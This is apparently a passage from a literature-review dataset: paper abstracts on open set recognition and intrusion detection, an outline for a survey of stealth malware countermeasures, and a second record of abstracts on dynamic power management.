formulation, we go on to describe the novel Weibull-calibrated SVM (W-SVM) algorithm, which combines the useful properties of statistical extreme value theory for score calibration with one-class and binary support vector machines. Our experiments show that the W-SVM is significantly better for open set object detection and OCR problems when compared to the state-of-the-art for the same tasks. --- paper_title: Estimating the Support of a High-Dimensional Distribution paper_content: Suppose you are given some data set drawn from an underlying probability distribution P and you want to estimate a "simple" subset S of input space such that the probability that a test point drawn from P lies outside of S equals some a priori specified value between 0 and 1. We propose a method to approach this problem by trying to estimate a function f that is positive on S and negative on the complement. The functional form of f is given by a kernel expansion in terms of a potentially small subset of the training data; it is regularized by controlling the length of the weight vector in an associated feature space. The expansion coefficients are found by solving a quadratic programming problem, which we do by carrying out sequential optimization over pairs of input patterns. We also provide a theoretical analysis of the statistical performance of our algorithm. The algorithm is a natural extension of the support vector algorithm to the case of unlabeled data. --- paper_title: An Adaptive Weighted One-Class SVM for Robust Outlier Detection paper_content: This paper focuses on outlier detection from the perspective of classification. One-class support vector machine (OCSVM) is a widely applied and effective method of outlier detection. Unfortunately experiments show that the standard one-class SVM is easy to be influenced by the outliers contained in the training dataset. To cope with this problem, a robust OCSVM is presented in the paper. In consideration that the contribution yielded by the outlying instances and the normal data is different, a robust one-class SVM which assigns an adapting weight for every object in the training dataset was proposed in this paper. Experimental analysis shows the better performances of the proposed weighted method compared to the conventional one-class SVM on robustness. --- paper_title: Towards Open World Recognition paper_content: With the of advent rich classification models and high computational power visual recognition systems have found many operational applications. Recognition in the real world poses multiple challenges that are not apparent in controlled lab environments. The datasets are dynamic and novel categories must be continuously detected and then added. At prediction time, a trained system has to deal with myriad unseen categories. Operational systems require minimal downtime, even to learn. To handle these operational issues, we present the problem of Open World Recognition and formally define it. We prove that thresholding sums of monotonically decreasing functions of distances in linearly transformed feature space can balance “open space risk” and empirical risk. Our theory extends existing algorithms for open world recognition. We present a protocol for evaluation of open world recognition systems. We present the Nearest Non-Outlier (NNO) algorithm that evolves model efficiently, adding object categories incrementally while detecting outliers and managing open space risk. We perform experiments on the ImageNet dataset with 1.2M+ images to validate the effectiveness of our method on large scale visual recognition tasks. NNO consistently yields superior results on open world recognition. --- paper_title: A building block for awareness in technical systems: Online novelty detection and reaction with an application in intrusion detection paper_content: In this article we propose a new building block to realize awareness in technical systems, a two-stage algorithm for online novelty detection and reaction in a probabilistic framework. It uses a combination of parametric as well as nonparametric density modeling techniques. First, observed samples are categorized as potentially novel. Then, clusters of potentially novel samples are identified and finally probabilistic models of the observed environment are extended by adding new model components that describe the novel process. To demonstrate the applicability of the proposed algorithm in self-adapting technical systems, we investigate a case study in the field of intrusion detection, where new kinds of attacks have to be identified by an intrusion detection system. That is, the algorithm is used in this article to realize environment-awareness, but it could in principal be taken for self- or context-awareness mechanisms, too. --- paper_title: Outlier Detection In Large-scale Traffic Data By Na\"ive Bayes Method and Gaussian Mixture Model Method paper_content: It is meaningful to detect outliers in traffic data for traffic management. However, this is a massive task for people from large-scale database to distinguish outliers. In this paper, we present two methods: Kernel Smoothing Na\"ive Bayes (NB) method and Gaussian Mixture Model (GMM) method to automatically detect any hardware errors as well as abnormal traffic events in traffic data collected at a four-arm junction in Hong Kong. Traffic data was recorded in a video format, and converted to spatial-temporal (ST) traffic signals by statistics. The ST signals are then projected to a two-dimensional (2D) (x,y)-coordinate plane by Principal Component Analysis (PCA) for dimension reduction. We assume that inlier data are normal distributed. As such, the NB and GMM methods are successfully applied in outlier detection (OD) for traffic data. The kernel smooth NB method assumes the existence of kernel distributions in traffic data and uses Bayes' Theorem to perform OD. In contrast, the GMM method believes the traffic data is formed by the mixture of Gaussian distributions and exploits confidence region for OD. This paper would address the modeling of each method and evaluate their respective performances. Experimental results show that the NB algorithm with Triangle kernel and GMM method achieve up to 93.78% and 94.50% accuracies, respectively. --- paper_title: Novelty detection: a review - part 1: statistical approaches paper_content: Novelty detection is the identification of new or unknown data or signal that a machine learning system is not aware of during training. Novelty detection is one of the fundamental requirements of a good classification or identification system since sometimes the test data contains information about objects that were not known at the time of training the model. In this paper we provide state-of-the-art review in the area of novelty detection based on statistical approaches. The second part paper details novelty detection using neural networks. As discussed, there are a multitude of applications where novelty detection is extremely important including signal processing, computer vision, pattern recognition, data mining, and robotics. --- paper_title: Online Adaboost-Based Parameterized Methods for Dynamic Distributed Network Intrusion Detection paper_content: Current network intrusion detection systems lack adaptability to the frequently changing network environments. Furthermore, intrusion detection in the new distributed architectures is now a major requirement. In this paper, we propose two online Adaboost-based intrusion detection algorithms. In the first algorithm, a traditional online Adaboost process is used where decision stumps are used as weak classifiers. In the second algorithm, an improved online Adaboost process is proposed, and online Gaussian mixture models (GMMs) are used as weak classifiers. We further propose a distributed intrusion detection framework, in which a local parameterized detection model is constructed in each node using the online Adaboost algorithm. A global detection model is constructed in each node by combining the local parametric models using a small number of samples in the node. This combination is achieved using an algorithm based on particle swarm optimization (PSO) and support vector machines. The global model in each node is used to detect intrusions. Experimental results show that the improved online Adaboost process with GMMs obtains a higher detection rate and a lower false alarm rate than the traditional online Adaboost process that uses decision stumps. Both the algorithms outperform existing intrusion detection algorithms. It is also shown that our PSO, and SVM-based algorithm effectively combines the local detection models into the global model in each node; the global model in a node can handle the intrusion types that are found in other nodes, without sharing the samples of these intrusion types. --- paper_title: Robust Fusion: Extreme Value Theory for Recognition Score Normalization paper_content: Recognition problems in computer vision often benefit from a fusion of different algorithms and/or sensors, with score level fusion being among the most widely used fusion approaches. Choosing an appropriate score normalization technique before fusion is a fundamentally difficult problem because of the disparate nature of the underlying distributions of scores for different sources of data. Further complications are introduced when one or more fusion inputs outright fail or have adversarial inputs, which we find in the fields of biometrics and forgery detection. Ideally a score normalization should be robust to model assumptions, modeling errors, and parameter estimation errors, as well as robust to algorithm failure. In this paper, we introduce the w-score, a new technique for robust recognition score normalization. We do not assume a match or non-match distribution, but instead suggest that the top scores of a recognition system's non-match scores follow the statistical Extreme Value Theory, and show how to use that to provide consistent robust normalization with a strong statistical basis. --- paper_title: Concept drift detection for online class imbalance learning paper_content: Concept drift detection methods are crucial components of many online learning approaches. Accurate drift detections allow prompt reaction to drifts and help to maintain high performance of online models over time. Although many methods have been proposed, no attention has been given to data streams with imbalanced class distributions, which commonly exist in real-world applications, such as fault diagnosis of control systems and intrusion detection in computer networks. This paper studies the concept drift problem for online class imbalance learning. We look into the impact of concept drift on single-class performance of online models based on three types of classifiers, under seven different scenarios with the presence of class imbalance. The analysis reveals that detecting drift in imbalanced data streams is a more difficult task than in balanced ones. Minority-class recall suffers from a significant drop after the drift involving the minority class. Overall accuracy is not suitable for drift detection. Based on the findings, we propose a new detection method DDM-OCI derived from the existing method DDM. DDM-OCI monitors minority-class recall online to capture the drift. The results show a quick response of the online model working with DDM-OCI to the new concept. --- paper_title: Adaptive network intrusion detection system using a hybrid approach paper_content: Any activity aimed at disrupting a service or making a resource unavailable or gaining unauthorized access can be termed as an intrusion. Examples include buffer overflow attacks, flooding attacks, system break-ins, etc. Intrusion detection systems (IDSs) play a key role in detecting such malicious activities and enable administrators in securing network systems. Two key criteria should be met by an IDS for it to be effective: (i) ability to detect unknown attack types, (ii) having very less miss classification rate. In this paper we describe an adaptive network intrusion detection system, that uses a two stage architecture. In the first stage a probabilistic classifier is used to detect potential anomalies in the traffic. In the second stage a HMM based traffic model is used to narrow down the potential attack IP addresses. Various design choices that were made to make this system practical and difficulties faced in integrating with existing models are also described. We show that this system achieves good performance empirically. --- paper_title: The Extreme Value Machine paper_content: It is often desirable to be able to recognize when inputs to a recognition function learned in a supervised manner correspond to classes unseen at training time. With this ability, new class labels could be assigned to these inputs by a human operator, allowing them to be incorporated into the recognition function—ideally under an efficient incremental update mechanism. While good algorithms that assume inputs from a fixed set of classes exist, e.g. , artificial neural networks and kernel machines, it is not immediately obvious how to extend them to perform incremental learning in the presence of unknown query classes. Existing algorithms take little to no distributional information into account when learning recognition functions and lack a strong theoretical foundation. We address this gap by formulating a novel, theoretically sound classifier—the Extreme Value Machine (EVM). The EVM has a well-grounded interpretation derived from statistical Extreme Value Theory (EVT), and is the first classifier to be able to perform nonlinear kernel-free variable bandwidth incremental learning. Compared to other classifiers in the same deep network derived feature space, the EVM is accurate and efficient on an established benchmark partition of the ImageNet dataset. --- paper_title: Multi-class Open Set Recognition Using Probability of Inclusion paper_content: The perceived success of recent visual recognition approaches has largely been derived from their performance on classification tasks, where all possible classes are known at training time. But what about open set problems, where unknown classes appear at test time? Intuitively, if we could accurately model just the positive data for any known class without overfitting, we could reject the large set of unknown classes even under an assumption of incomplete class knowledge. In this paper, we formulate the problem as one of modeling positive training data at the decision boundary, where we can invoke the statistical extreme value theory. A new algorithm called the P I -SVM is introduced for estimating the unnormalized posterior probability of class inclusion. --- paper_title: Probability Models for Open Set Recognition paper_content: Real-world tasks in computer vision often touch upon open set recognition: multi-class recognition with incomplete knowledge of the world and many unknown inputs. Recent work on this problem has proposed a model incorporating an open space risk term to account for the space beyond the reasonable support of known classes. This paper extends the general idea of open space risk limiting classification to accommodate non-linear classifiers in a multi-class setting. We introduce a new open set recognition model called compact abating probability (CAP), where the probability of class membership decreases in value (abates) as points move from known data toward open space. We show that CAP models improve open set recognition for multiple algorithms. Leveraging the CAP formulation, we go on to describe the novel Weibull-calibrated SVM (W-SVM) algorithm, which combines the useful properties of statistical extreme value theory for score calibration with one-class and binary support vector machines. Our experiments show that the W-SVM is significantly better for open set object detection and OCR problems when compared to the state-of-the-art for the same tasks. --- paper_title: Applying CMAC-based online learning to intrusion detection paper_content: The timely and accurate detection of computer and network system intrusions has always been an elusive goal for system administrators and information security researchers. Existing intrusion detection approaches require either manual coding of new attacks in expert systems or the complete retraining of a neural network to improve analysis or learn new attacks. The paper presents an approach to applying adaptive neural networks to intrusion detection that is capable of autonomously learning new attacks rapidly by a modified reinforcement learning method that uses feedback from the protected system. --- paper_title: Multi-attribute spaces: Calibration for attribute fusion and similarity search paper_content: Recent work has shown that visual attributes are a powerful approach for applications such as recognition, image description and retrieval. However, fusing multiple attribute scores — as required during multi-attribute queries or similarity searches — presents a significant challenge. Scores from different attribute classifiers cannot be combined in a simple way; the same score for different attributes can mean different things. In this work, we show how to construct normalized “multi-attribute spaces” from raw classifier outputs, using techniques based on the statistical Extreme Value Theory. Our method calibrates each raw score to a probability that the given attribute is present in the image. We describe how these probabilities can be fused in a simple way to perform more accurate multiattribute searches, as well as enable attribute-based similarity searches. A significant advantage of our approach is that the normalization is done after-the-fact, requiring neither modification to the attribute classification system nor ground truth attribute annotations. We demonstrate results on a large data set of nearly 2 million face images and show significant improvements over prior work. We also show that perceptual similarity of search results increases by using contextual attributes. --- paper_title: Towards Open World Recognition paper_content: With the of advent rich classification models and high computational power visual recognition systems have found many operational applications. Recognition in the real world poses multiple challenges that are not apparent in controlled lab environments. The datasets are dynamic and novel categories must be continuously detected and then added. At prediction time, a trained system has to deal with myriad unseen categories. Operational systems require minimal downtime, even to learn. To handle these operational issues, we present the problem of Open World Recognition and formally define it. We prove that thresholding sums of monotonically decreasing functions of distances in linearly transformed feature space can balance “open space risk” and empirical risk. Our theory extends existing algorithms for open world recognition. We present a protocol for evaluation of open world recognition systems. We present the Nearest Non-Outlier (NNO) algorithm that evolves model efficiently, adding object categories incrementally while detecting outliers and managing open space risk. We perform experiments on the ImageNet dataset with 1.2M+ images to validate the effectiveness of our method on large scale visual recognition tasks. NNO consistently yields superior results on open world recognition. --- paper_title: CLUSTERING-BASED NETWORK INTRUSION DETECTION paper_content: Recently data mining methods have gained importance in addressing network security issues, including network intrusion detection — a challenging task in network security. Intrusion detection systems aim to identify attacks with a high detection rate and a low false alarm rate. Classification-based data mining models for intrusion detection are often ineffective in dealing with dynamic changes in intrusion patterns and characteristics. Consequently, unsupervised learning methods have been given a closer look for network intrusion detection. We investigate multiple centroid-based unsupervised clustering algorithms for intrusion detection, and propose a simple yet effective self-labeling heuristic for detecting attack and normal clusters of network traffic audit data. The clustering algorithms investigated include, k-means, Mixture-Of-Spherical Gaussians, Self-Organizing Map, and Neural-Gas. The network traffic datasets provided by the DARPA 1998 offline intrusion detection project are used in our empirical investigation, which demonstrates the feasibility and promise of unsupervised learning methods for network intrusion detection. In addition, a comparative analysis shows the advantage of clustering-based methods over supervised classification techniques in identifying new or unseen attack types. --- paper_title: Approaches to Online Learning and Concept Drift for User Identification in Computer Security paper_content: The task in the computer security domain of anomaly detection is to characterize the behaviors of a computer user (the 'valid' , or 'normal' user) so that unusual occurrences can be detected by comparison of the current input stream to the valid user's profile. This task requires an online learning system that can respond to concept drift and handle discrete non-metric time sequence data. We present an architecture for online learning in the anomaly detection domain and address the issues of incremental updating of system parameters and instance selection. We demonstrate a method for measuring direction and magnitude of concept drift in the classification space and present and evaluate approaches to the above stated issues which make use of the drift measurement. --- paper_title: Anomalous Payload-Based Network Intrusion Detection paper_content: We present a payload-based anomaly detector, we call PAYL, for intrusion detection. PAYL models the normal application payload of network traffic in a fully automatic, unsupervised and very effecient fashion. We first compute during a training phase a profile byte frequency distribution and their standard deviation of the application payload flowing to a single host and port. We then use Mahalanobis distance during the detection phase to calculate the similarity of new data against the pre-computed profile. The detector compares this measure against a threshold and generates an alert when the distance of the new input exceeds this threshold. We demonstrate the surprising effectiveness of the method on the 1999 DARPA IDS dataset and a live dataset we collected on the Columbia CS department network. In once case nearly 100% accuracy is achieved with 0.1% false positive rate for port 80 traffic. --- paper_title: Generation of a new IDS test dataset: Time to retire the KDD collection paper_content: Intrusion detection systems are generally tested using datasets compiled at the end of last century, justified by the need for publicly available test data and the lack of any other alternative datasets. Prominent amongst this legacy group is the KDD project. Whilst a seminal contribution at the time of compilation, these datasets no longer represent relevant architecture or contemporary attack protocols, and are beset by data corruptions and inconsistencies. Hence, testing of new IDS approaches against these datasets does not provide an effective performance metric, and contributes to erroneous efficacy claims. This paper introduces a new publicly available dataset which is representative of modern attack structure and methodology. The new dataset is contrasted with the legacy datasets, and the performance difference of commonly used intrusion detection algorithms is highlighted. --- paper_title: A Semantic Approach to Host-Based Intrusion Detection Systems Using Contiguousand Discontiguous System Call Patterns paper_content: Host-based anomaly intrusion detection system design is very challenging due to the notoriously high false alarm rate. This paper introduces a new host-based anomaly intrusion detection methodology using discontiguous system call patterns, in an attempt to increase detection rates whilst reducing false alarm rates. The key concept is to apply a semantic structure to kernel level system calls in order to reflect intrinsic activities hidden in high-level programming languages, which can help understand program anomaly behaviour. Excellent results were demonstrated using a variety of decision engines, evaluating the KDD98 and UNM data sets, and a new, modern data set. The ADFA Linux data set was created as part of this research using a modern operating system and contemporary hacking methods, and is now publicly available. Furthermore, the new semantic method possesses an inherent resilience to mimicry attacks, and demonstrated a high level of portability between different operating system versions. ---
Title: A Survey of Stealth Malware Attacks, Mitigation Measures, and Steps Toward Autonomous Open World Solutions Section 1: A Survey of Existing Stealth Malware Description 1: Discuss various types of stealth technology including rootkits, code mutation, anti-emulation, and targeting mechanisms, explaining each in detail. Section 2: Component-Based Stealth Malware Countermeasures Description 2: Explain anti-stealth malware techniques that protect system integrity, including hook detection, cross-view detection, invariant specification, and hardware and virtualization solutions. Section 3: Pattern-Based Stealth Malware Countermeasures Description 3: Describe generic recognition techniques for malware detection, focusing on static and dynamic analysis, signature analysis, and behavioral/heuristic analysis. Section 4: Toward Adaptive Models for Stealth Malware Recognition Description 4: Discuss the need for adaptive and interpretable recognition systems, detailing six flawed modeling assumptions and proposing an adaptive open world mathematical framework for improved stealth malware recognition. Section 5: An Open Set Recognition Framework Description 5: Explain the open set recognition problem, theorems proving open space risk management, and practical implementation to enhance existing intrusion recognition algorithms. Section 6: Open World Archetypes for Stealth Malware Intrusion Recognition Description 6: Discuss how open set recognition can be extended to open world recognition, supporting incremental model updates and prioritizing novel malware detection through malicious likelihood criteria. Section 7: Conclusions and Open Issues Description 7: Summarize findings, highlight the importance of combining countermeasures with machine learning solutions, and address open issues like bounding open space risk, misclassification costs, and the need for good datasets.
A survey of design techniques for system-level dynamic power management
5
--- paper_title: Dynamic Power Management: Design Techniques and CAD Tools paper_content: From the Publisher: ::: Dynamic Power Management: Design Techniques and CAD Tools addresses design techniques and computer-aided design solutions for power management. Different approaches are presented and organized in an order related to their applicability to control-units, macro-blocks, digital circuits and electronic systems, respectively. All approaches are based on the principle of exploiting idleness of circuits, systems, or portions thereof. They involve both detection of idleness conditions and the freezing of power-consuming activities in the idle components. Dynamic Power Management: Design Techniques and CAD Tools is of interest to researchers and developers of computer-aided design tools for integrated circuits and systems, as well as to system designers. --- paper_title: Software Strategies for Portable Computer Energy Management paper_content: Limiting the energy consumption of computers, especially portables, is becoming increasingly important. Thus, new energy-saving computer components and architectures have been and continue to be developed. Many architectural features have both high-performance and low-power modes, with the mode selection under software control. The problem is to minimize energy consumption while not significantly impacting the effective performance. We group the software control issues as follows: transition, load-change, and adaptation. The transition problem is deciding when to switch to low-power, reduced-functionality modes. The load-change problem is determining how to modify the load on a component so that it can make further use of its low-power modes. The adaptation problem is determining how to create software that allows components to be used in novel, power-saving ways. We survey implemented and proposed solutions to software energy management issues created by existing and suggested hardware innovations. --- paper_title: PowerPC 603, a microprocessor for portable computers paper_content: The PowerPC 603 incorporates a variety of features to reduce power dissipation: dynamic idle-time shutdown of separate execution units, low-power cache design, and power considerations for standard cells, data-path elements, and clocking. System-level features include three software-programmable static power management modes and a hardware-programmable phase-lock loop. Operating at 80 MHz, the 603 typically dissipates 2.2 W, while achieving an estimated 75 Specint92 and 85 Specfp92. > --- paper_title: Technology directions for portable computers paper_content: This paper contains an evaluation of trends in the key system parameters (e.g., size, weight, function, performance, battery life) for battery-powered portable computers, together with a review of development trends in the technologies required for such systems. The discussion focuses on notebook-size portable computers. Those technologies which will have substantial impact on battery life and power budgets of future notebook computers receive the primary emphasis in this paper for example, liquid crystal displays, storage technology, wireless communication technology, and low power electronics. System power management is also be addressed. The basic theme of this paper is first to develop a view of what the key attributes of future notebook computers will be, and then to discuss how technologies must evolve to allow such systems to be advanced over the current state of the art in terms of portability and battery life. > --- paper_title: System-level power estimation and optimization paper_content: Most work to date on power reduction has focused at the component level, not at the system level. In this paper, we propose a framework for describing the power behavior of system-level designs. The model consists of a set of resources, an environmental workload specification, and a power management policy, which serves as the heart of the system model. We map this model to a simulation-based framework to obtain an estimate of the system's power dissipation. Accompanying this, we propose an algorithm to optimize power management policies. The optimization algorithm can be used in a tight loop with the estimation engine to derive new power-management policy algorithms for a given system-level description. We tested our approach by applying it to a real-life low-power portable design, achieving a power estimation accuracy of /spl sim/10%, and a 23% reduction in power after policy optimization. --- paper_title: Toward power-sensitive network architectures in wireless communications: concepts, issues, and design aspects paper_content: Transmitter power control can be used to concurrently achieve several key objectives in wireless networking, including minimizing power consumption and prolonging the battery life of mobile nodes, mitigating interference and increasing the network capacity, and maintaining the required link QoS by adapting to node movements, fluctuating interference, channel impairments, and so on. Moreover, power control can be used as a vehicle for implementing on-line several basic network operations, including admission control, channel selection and switching, and handoff control. We consider issues associated with the design of power-sensitive wireless network architectures, which utilize power efficiently in establishing user communication at required QoS levels. Our focus is mainly on the network layer and less on the physical one. Besides reviewing some of the developments in power control, we also formulate some general associated concepts which have wide applicability to wireless network design. A synthesis of these concepts into a framework for power-sensitive network architectures is done, based on some key justifiable points. Various important relevant issues are highlighted and discussed, as well as several directions for further research in this area. Overall, a first step is taken toward the design of power-sensitive network architectures for next-generation wireless networks. --- paper_title: Mobile power management for wireless communication networks paper_content: For fixed quality-of-service constraints and varying channel interference, how should a mobile node in a wireless network adjust its transmitter power so that energy consumption is minimized? Several transmission schemes are considered, and optimal solutions are obtained for channels with stationary, extraneous interference. A simple dynamic power management algorithm based on these solutions is developed. The algorithm is tested by a series of simulations, including the extraneous-interference case and the more general case where multiple, mutually interfering transmitters operate in a therefore highly responsive interference environment. Power management is compared with conventional power control for models based on FDMA/TDMA and CDMA cellular networks. Results show improved network capacity and stability in addition to substantially improved battery life at the mobile terminals. --- paper_title: Low power communications protocols: paging and beyond paper_content: Paging subscriber devices leverage multiple technologies to achieve low power and long battery life: semiconductors, circuits, systems architecture and network protocol. While many types of electronic devices have capitalized on low-power features for several of these technologies, few other than personal paging services have taken advantage of opportunities presented by well designed protocols with explicit power-reduction features. This paper will review the state-of-practice in existing paging services, and discuss the relevance of such techniques to other wireless communication systems. --- paper_title: Energy constrained error control for wireless channels paper_content: We posit that limiting the performance metrics of error control protocols to throughput and delay is inappropriate when terminals are powered by a finite energy battery source. We propose the total number of correctly transmitted packets during the lifetime of a finite energy source as another metric. We study the go-back-N error control protocol assuming (1) Markov errors on both the forward and the feedback channels and (2) a finite energy source with a flat power profile, and characterize the sensitivity of the total number of correctly transmitted packets to the choice of the output power level. We then generalize our results to arbitrary power profiles through both a recursive technique and Markov analysis. Finally, we compare the performance of GBN with an adaptive error control protocol (which slows down the transmission rate when the channel is impaired) and document the advantages. --- paper_title: Monitoring system activity for OS-directed dynamic power management paper_content: Most work to date on power reduction has focused at the component level, not at the system level. In this paper, we propose a framework for describing the power behavior of system-level designs. The model consists of a set of resources, an environmental workload specification, and a power management policy , which serves as the heart of the system model. We map this model to a simulation-based framework to obtain an estimate of the system's power dissipation. Accompanying this, we propose an algorithm to optimize power management policies. The optimization algorithm can be used in a tight loop with the estimation engine to derive new power-management policy algorithms for a given system-level description. We tested our approach by applying it to a real-life low-power portable design, achieving a power estimation accuracy of ∼10%, and a 23% reduction in power after policy optimization. --- paper_title: System-level power estimation and optimization paper_content: Most work to date on power reduction has focused at the component level, not at the system level. In this paper, we propose a framework for describing the power behavior of system-level designs. The model consists of a set of resources, an environmental workload specification, and a power management policy, which serves as the heart of the system model. We map this model to a simulation-based framework to obtain an estimate of the system's power dissipation. Accompanying this, we propose an algorithm to optimize power management policies. The optimization algorithm can be used in a tight loop with the estimation engine to derive new power-management policy algorithms for a given system-level description. We tested our approach by applying it to a real-life low-power portable design, achieving a power estimation accuracy of /spl sim/10%, and a 23% reduction in power after policy optimization. --- paper_title: Guarded evaluation: pushing power management to logic synthesis/design paper_content: The need to reduce the power consumption of the next generation of digital systems is clearly recognized at all levels of system design. At the system level, power management is a very powerful technique and delivers large and unambiguous savings. The ideas behind power management can be extended to the logic level. This would involve determining which parts of a circuit are computing results that will be used and which are not. The parts that are not needed are then "shut off". This paper describes an approach termed guarded evaluation, which is an implementation of this idea. A theoretical framework and the algorithms that form the basis of the approach are presented. The underlying idea is to automatically determine the parts of the circuit that can be disabled on a per-clock-cycle basis. This saves the power used in all the useless transitions in those parts of the circuit. Initial experiments indicate substantial power savings and the strong potential of this approach for a large number of benchmark circuits. While this paper presents the development of these ideas at the logic level of design, the same ideas have direct application at the register-transfer level of design also. --- paper_title: Adaptive Disk Spindown via Optimal Rent-to-Buy in Probabilistic Environments paper_content: In the {single rent-to-buy decision} problem, without a priori knowledge of the amount of time a resource will be used we need to decide when to buy the resource, given that we can rent the resource for \$1 per unit time or buy it once and for all for \$$c$. In this paper we study algorithms that make a sequence of single rent-to-buy decisions, using the assumption that the resource use times are independently drawn from an unknown probability distribution. Our study of this rent-to-buy problem is motivated by important systems applications, specifically, problems arising from deciding when to spindown disks to conserve energy in mobile computers~[DKM, LKH, MDK], thread blocking decisions during lock acquisition in multiprocessor applications~[KLM], and virtual circuit holding times in IP-over-ATM networks~[KLP, SaK]. We develop a provably optimal and computationally efficient algorithm for the rent-to-buy problem and evaluate its practical merit for the disk spindown scenario via simulation studies. Our algorithm uses $O(\sqrt{t})$ time and space, and its expected cost for the $t$th resource use converges to optimal as $O(\sqrt{\log t/t})$, for any bounded probability distribution on the resource use times. Alternatively, using $O(1)$ time and space, the algorithm almost converges to optimal. We describe the results of simulating our algorithm for the disk spindown problem using disk access traces obtained from an HP workstation environment. We introduce the natural notion of {\em effective cost\/} which merges the effects of energy conservation and response time performance into one metric based on a user specified parameter~$a$, the relative importance of response time to energy conservation. (The buy cost~$c$ varies linearly with~$a$.) We observe that by varying~$a$, we can model the tradeoff between power and response time well. We also show that our algorithm is best in terms of effective cost for almost all values of~$a$, saving effective cost by 6--25\% over the optimal online algorithm in the competitive model~(i.e., the 2-competitive algorithm that spins down the disk after waiting~$c$ seconds). In addition, for small values of~$a$ (corresponding to when saving energy is critical), our algorithm when compared against the optimal online algorithm in the competitive model reduces excess energy by 17--60\%, and when compared against the 5~second threshold reduces excess energy by 6--42\%. --- paper_title: Idleness is not sloth paper_content: Many people have observed that computer systems spend much of their time idle, and various schemes have been proposed to use this idle time productively. The commonest approach is to off-load activity from busy periods to less-busy ones in order to improve system responsiveness. In addition, speculative work can be performed in idle periods in the hopes that it will be needed later at times of higher utilization, or non-renewable resource like battery power can be conserved by disabling unused resources. ::: ::: We found opportunities to exploit idle time in our work on storage systems, and after a few attempts to tackle specific instances of it in ad hoc ways, began to investigate general mechanisms that could be applied to this problem. Our results include a taxonomy of idle-time detection algorithms, metrics for evaluating them, and an evaluation of a number of idleness predictors that we generated from our taxonomy. --- paper_title: Adaptive hard disk power management on personal computers paper_content: Dynamic power management can be effective for designing low-power systems. In many systems, requests are clustered into sessions. This paper proposes an adaptive algorithm that can predict session lengths and shut down components between sessions to save power. Compared to other approaches, simulations show that this algorithm can reduce power consumption in hard disks with less impact on performance or reliability. --- paper_title: Transformation and synthesis of FSMs for low-power gated-clock implementation paper_content: We present a technique that automatically synthesizes nite state machines with gated clocks to reduce the power dissipation of the nal implementation. We describe a new transformation for general incompletely speci ed Mealy-type machines that makes them suitable for gated clock implementation. The transformation is probabilistic-driven, and leads to the synthesis of an optimized combinational logic block that stops the clock with --- paper_title: Adaptive Disk Spin-Down Policies for Mobile Computers paper_content: Mobile computers typically spin down their hard disk after a fixed period of inactivity. If this threshold is too long, the disk wastes energy; if it is too short, the delay due to spinning the disk up again frushates the user. Usage patterns change over time, so a single fixed threshold may not be appropriate at all times. Also, different users may have varying pri- orities with respect to trading off energy conservation against performance. We describe a method for vary- ing the spin-down threshold dynamically by adapting to the user's access patterns and priorities. Adaptive spin-down can in some circumstances reduce by up to 507o the number of disk spin-ups that are deemed by the user to be inconvenient, while only moderately increasing energy consumption. --- paper_title: Predictive system shutdown and other architectural techniques for energy efficient programmable computation paper_content: With the popularity of portable devices such as personal digital assistants and personal communicators, as well as with increasing awareness of the economic and environmental costs of power consumption by desktop computers, energy efficiency has emerged as an important issue in the design of electronic systems. While power efficient ASIC's with dedicated architectures have addressed the energy efficiency issue for niche applications such as DSP, much of the computation continues to be implemented as software running on programmable processors such as microprocessors, microcontrollers, and programmable DSP's. Not only is this true for general purpose computation on personal computers and workstations, but also for portable devices, application-specific systems etc. In fact, firmware and embedded software executing on RISC and DSP processor cores that are embedded in ASIC's has emerged as a leading implementation methodology for speech coding, modem functionality, video compression, communication protocol processing etc. This paper describes architectural techniques for energy efficient implementation of programmable computation, particularly focussing on the computation needed in portable devices where event-driven user interfaces, communication protocols, and signal processing play a dominant role. Two key approaches described here are predictive system shutdown and extended voltage scaling. Results indicate that a large reduction in power consumption can be achieved over current day solutions with little or no loss in system performance. --- paper_title: A predictive system shutdown method for energy saving of event-driven computation paper_content: This paper presents a system-level power management technique for energy savings of event-driven application. We present a new predictive system-shutdown method to exploit sleep mode operations for energy saving. We use an exponential-average approach to predict the upcoming idle period. We introduce two mechanisms, prediction-miss correction and prewake-up, to improve the hit ratio and to reduce the delay overhead. Experiments on four different event-driven applications show that our proposed method achieves high hit ratios in a wide range of delay overheads, which results in a high degree of energy with low delay penaties. --- paper_title: Competitive randomized algorithms for nonuniform problems paper_content: Competitive analysis is concerned with comparing the performance of on-line algorithms with that of optimal off-line algorithms. In some cases randomization can lead to algorithms with improved performance ratios on worst-case sequences. In this paper we present new randomized on-line algorithms for snoopy caching and the spin-block problem. These algorithms achieve competitive ratios approachinge/(eź1) ź 1.58 against an oblivious adversary. These ratios are optimal and are a surprising improvement over the best possible ratio in the deterministic case, which is 2. We also consider the situation when the request sequences for these problems are generated according to an unknown probability distribution. In this case we show that deterministic algorithms that adapt to the observed request statistics also have competitive factors approachinge/(eź1). Finally, we obtain randomized algorithms for the 2-server problem on a class of isosceles triangles. These algorithms are optimal against an oblivious adversary and have competitive ratios that approache/(eź1). This compares with the ratio of 3/2 that can be achieved on an equilateral triangle. --- paper_title: Precomputation-based sequential logic optimization for low power paper_content: We address the problem of optimizing logic-level sequential circuits for low power. We present a powerful sequential logic optimization method that is based on selectively precomputing the output logic values of the circuit one clock cycle before they are required, and using the precomputed values to reduce internal switching activity in the succeeding clock cycle. We present two different precomputation architectures which exploit this observation. ::: We present an automatic method of synthesizing precomputational logic so as to achieve maximal reductions in power dissipation. We present experimental results on various sequential circuits. Up to 75% reductions in average switching activity and power dissipation are possible with marginal increases in circuit area and delay. --- paper_title: Dynamic power management for nonstationary service requests paper_content: Dynamic power management (DPM) is a design methodology aimed at reducing power consumption of electronic systems by performing selective shutdown of idle system resources. The effectiveness of a power management scheme depends critically on accurate modeling of service requests and on computation of the control policy. In this work, we present an online adaptive DPM scheme for systems that can be modeled as finite-state Markov chains. Online adaptation is required to deal with initially unknown or nonstationary workloads, which are very common in real-life systems. Our approach moves from exact policy optimization techniques in a known and stationary stochastic environment and extends optimum stationary control policies to handle the unknown and nonstationary stochastic environment for practical applications. We introduce two workload learning techniques based on sliding windows and study their properties. Furthermore, a two-dimensional interpolation technique is introduced to obtain adaptive policies from a precomputed look-up table of optimum stationary policies. The effectiveness of our approach is demonstrated by a complete DPM implementation on a laptop computer with a power-manageable hard disk that compares very favorably with existing DPM schemes. --- paper_title: Policy optimization for dynamic power management paper_content: Dynamic power management schemes (also called policies) can be used to control the power consumption levels of electronic systems, by setting their components in different states, each characterized by a performance level and a power consumption. In this paper, we describe power-managed systems using a finite-state, stochastic model. Furthermore, we show that the fundamental problem of finding an optimal policy which maximizes the average performance level of a 